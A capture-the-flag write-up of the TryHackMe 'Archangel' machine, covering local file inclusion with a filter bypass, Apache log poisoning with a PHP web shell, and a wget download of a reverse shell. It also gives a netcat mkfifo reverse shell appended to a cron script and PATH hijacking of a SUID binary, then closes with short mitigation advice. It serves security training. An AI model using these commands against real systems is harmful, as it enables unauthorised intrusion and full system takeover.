Mar 16, 2021
Archangel Write-up
Description
Archangel is a boot2root CTF on TryHackMe. A well known security solutions company seems to be doing some testing on their live machine. Best time to exploit it.
Enumeration
First of all, we have to determine which services are running on the target machine. For this reason we will start a Nmap scan with the following command sudo nmap -p- $TARGET_IP:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-17 15:53 EST
Nmap scan report for localhost ($TARGET_IP)
Host is up (0.080s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 116.07 secondsAs you can see the target is running SSH on port 22 and a web server on port 80. We can now check out the website.
On the website we can check the HTTP headers. Just open the developer console and navigate to the “Network” tab. We can determine through the HTTP header that Apache 2.4.29 is running. The target is a Ubuntu machine.
On the website we can determine a domain for the server. It is used as a domain for the Email address.
You can now add that domain to your /etc/hosts file. Finally you should be able to navigate to that domain. You will see a “under development” page and the first flag.
Next we can check if a “robots.txt” file exists. Luckily for us there is one. The “robots.txt” file contains the path “/test.php”.
On the “/test.php” path there is a button. This button will include another site.
We can click on that button and see a new text. Additionally the URL changes.
We can now test for a LFI vulnerability. The parameter “view” is prone to LFI. We can now read the source code of the “test.php” file:
http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php 
This will return the source code of “test.php” in base64 encoded data. We can easily decode it with CyberChef or with bash and the command echo <source code> | base64 -d > test.php. You can now open the file in a text editor. This will reveal the filter and another flag.
We can easily bypass that filter by using “.././..” instead of “../..”. The following command bypasses the filter and displays the “/etc/passwd” file:
http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././../etc/passwd
We can also test if we can access the Apache access logs. The following URL will get the access logs successfully.
http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././../var/log/apache2/access.logInitial Access
With that knowledge we can now perform log poisoning to get a reverse shell. Start burp suite and intercept a request. Place the PHP command <?php system($_GET['cmd']); ?> inside the “User-Agent” field.
Now we can inject shell commands and get the output inside the access log. An example requests for the id command:
http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././../var/log/apache2/access.log&cmd=id
Initial Access
We can now use this simple web shell to upload a reverse shell. I have used the PHP reverse shell of Pentestmonkey. Host a web server with that shell on your machine and inject a wget command to download the reverse shell.
http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././../var/log/apache2/access.log&cmd=wget%20http://$YOUR_IP_AND_PORT/s.phpAfter starting a netcat listener on your host with the command nc -lvnp 1234, you can navigate to the URL “ “http://mafialive.thm/test.php?view=/var/www/html/development_testing/s.php"” and get a reverse shell.
listening on [any] 1234 ...
Linux ubuntu 4.15.0-123-generic #126-Ubuntu SMP Wed Oct 21 09:40:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
03:27:09 up 1:06, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$Next drop into a TTY shell with the following Python command:
python3 -c "import pty; pty.spawn('/bin/bash')"Finally you can read the user flag with the command cat /home/archangel/user.txt.
Enumeration
During enumeration we can spot that the archangel user is running a cronjob every minute.
We can write into the “helloworld.sh” script.
Privilege Escalation to the archangel user
Now we can again start a netcat listener on the attacker machine. After that we can place a netcat reverse shell inside the “helloworld.sh” script to gain a shell as archangel.
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $MACHINE_IP 1234 >/tmp/f" >> helloworld.sh
Now we can read the second flag, which is placed inside the “secret” directory of the archangel user.
Inside the “secret” directory there is a binary called “backup”. This binary has the SUID bit set. Running strings against the binary reveals, that it runs cp /home/user/archangel/myfiles/* /opt/backupfiles.
Privilege Escalation to root
The “backup” binary can be abused to escalated our privileges. Run the following commands. Create a file called “cp” with touch cp. Next run the following commands to make it run bash:
echo '#!/bin/bash' >> cp
echo '/bin/bash' >> cpAfter that change your “PATH” variable to contain the current folder first.
export PATH="/home/archangel/secret:$PATH"Finally you can run the “backup” binary: ./backup. After running the “backup” binary we should be root and able to read the root flag:
Mitigation
Never deploy anything that is under development on a live machine. Also the filter should be hardened. Furthermore the “helloworld.sh” script should only be writable by the owner. The backup binary should use absolute paths, instead of just calling cp.
